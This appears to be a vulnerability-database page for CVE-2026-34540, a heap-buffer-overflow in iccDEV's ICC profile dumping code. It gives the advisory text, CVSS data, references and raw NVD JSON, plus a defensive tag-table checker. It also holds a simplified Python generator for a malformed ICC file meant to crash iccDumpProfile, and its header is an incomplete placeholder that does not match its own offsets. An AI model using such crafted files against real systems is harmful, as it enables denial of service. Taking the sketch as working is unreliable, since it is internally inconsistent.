Security Vulnerability Report
CVE-2026-34540 CVSS 6.2 MEDIUM

CVE-2026-34540

Published: 2026-03-31 22:16:22
Last Modified: 2026-04-20 13:53:34

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a heap-buffer-overflow (HBO) in icMemDump() when iccDumpProfile attempts to dump/describe malformed tag contents. The issue is observable under AddressSanitizer as an out-of-bounds heap read in icMemDump(...) at IccProfLib/IccUtil.cpp:1002, reachable via CIccTagUnknown::Describe(). This issue has been patched in version 2.3.1.6.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# CVE-2026-34540 PoC Generator
# This script generates a crafted ICC profile that may trigger the heap buffer overflow in iccDEV.

# ICC Profile Header (simplified)
header = b"\x00\x00\x00\x00"  # Profile size (placeholder)
header += b"acsp"  # CMM type signature
header += b"\x00\x00\x00\x00"  # Profile version
# ... (rest of standard header fields)

# Create a malformed tag. The vulnerability occurs in icMemDump when dumping malformed tags.
# We will craft a tag entry pointing to invalid data or with a size that causes overflow.
tag_count = 1
tag_table = b""
tag_signature = b"desc"
offset_to_data = 128 + 4 + (tag_count * 12)  # Offset after header and tag count and table
tag_size = 0xFFFFFFFF  # Excessive size to trigger overflow in icMemDump

tag_table += tag_signature
tag_table += struct.pack(">I", offset_to_data)
tag_table += struct.pack(">I", tag_size)

# Assemble the profile
profile_size = len(header) + 4 + len(tag_table) + tag_size
header = struct.pack(">I", profile_size) + header[4:]  # Update size
payload = header + struct.pack(">I", tag_count) + tag_table
payload += b"A" * 100  # Minimal data padding

filename = "cve_2026_34540_poc.icc"
with open(filename, "wb") as f:
    f.write(payload)

print(f"POC file generated: {filename}")
print("Usage: Load this file with a vulnerable version of iccDEV using iccDumpProfile.")
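A defensive counterpart to the generator above, added here and not part of the original page or of iccDEV: a pre-check that compares every tag-table entry's offset and size against the real file length before a profile is handed to a dumping tool. The function names and the constructed in-memory sample are assumptions for illustration; the check flags structurally inconsistent tag entries such as the oversized tag size the generator describes, and is not the fix shipped in 2.3.1.6.

```python
import struct

HEADER_LEN = 128     # fixed ICC header length
ENTRY_LEN = 12       # tag table entry: signature, offset, size (big-endian)

def check_tag_table(data: bytes) -> list:
    """Return structural problems found in an ICC profile's tag table."""
    if len(data) < HEADER_LEN + 4:
        return ["file shorter than header plus tag count"]
    problems = []
    (declared,) = struct.unpack_from(">I", data, 0)
    if declared != len(data):
        problems.append(f"header size {declared} != file length {len(data)}")
    if data[36:40] != b"acsp":
        problems.append("missing 'acsp' signature at offset 36")
    (count,) = struct.unpack_from(">I", data, HEADER_LEN)
    table_end = HEADER_LEN + 4 + count * ENTRY_LEN
    if table_end > len(data):
        return problems + [f"tag table with {count} entries runs past end of file"]
    for i in range(count):
        sig, off, size = struct.unpack_from(">4sII", data, HEADER_LEN + 4 + i * ENTRY_LEN)
        name = sig.decode("latin-1")
        if off < table_end:
            problems.append(f"tag {name}: offset {off} points into header or tag table")
        if off + size > len(data):   # Python ints cannot wrap, unlike uint32 math in C
            problems.append(f"tag {name}: offset+size {off + size} exceeds file length")
    return problems

def build_sample(size_field=None) -> bytes:
    """Constructed in-memory sample: zeroed header fields, one 16-byte tag."""
    tag_data = b"text" + bytes(4) + b"sample\x00\x00"
    data_off = HEADER_LEN + 4 + ENTRY_LEN
    header = bytearray(HEADER_LEN)
    struct.pack_into(">I", header, 0, data_off + len(tag_data))
    header[36:40] = b"acsp"
    size = len(tag_data) if size_field is None else size_field
    entry = struct.pack(">4sII", b"desc", data_off, size)
    return bytes(header) + struct.pack(">I", 1) + entry + tag_data

if __name__ == "__main__":
    for label, blob in (("consistent", build_sample()),
                        ("oversized tag", build_sample(0xFFFFFFFF))):
        print(label, "->", check_tag_table(blob) or "ok")
```

Running a check like this in front of profile-handling tools rejects inconsistent files early; upgrading to iccDEV 2.3.1.6 remains the actual remediation.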

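References

https://github.com/InternationalColorConsortium/iccDEV/issues/674 (Issue Tracking, Exploit)
https://github.com/InternationalColorConsortium/iccDEV/pull/689 (Issue Tracking, Patch)
https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-gjx3-6cp6-q2x5 (Patch, Vendor Advisory)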

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34540", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:21.600", "lastModified": "2026-04-20T13:53:34.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a heap-buffer-overflow (HBO) in icMemDump() when iccDumpProfile attempts to dump/describe malformed tag contents. The issue is observable under AddressSanitizer as an out-of-bounds heap read in icMemDump(...) at IccProfLib/IccUtil.cpp:1002, reachable via CIccTagUnknown::Describe(). This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, un perfil ICC manipulado puede desencadenar un desbordamiento de búfer de pila (HBO) en icMemDump() cuando iccDumpProfile intenta volcar/describir contenidos de etiquetas malformados. El problema es observable bajo AddressSanitizer como una lectura de pila fuera de límites en icMemDump(...) en IccProfLib/IccUtil.cpp:1002, alcanzable a través de CIccTagUnknown::Describe(). 
Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/674", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/689", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-gjx3-6cp6-q2x5", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/674", "source": 
"134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/689", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Patch"]}]}}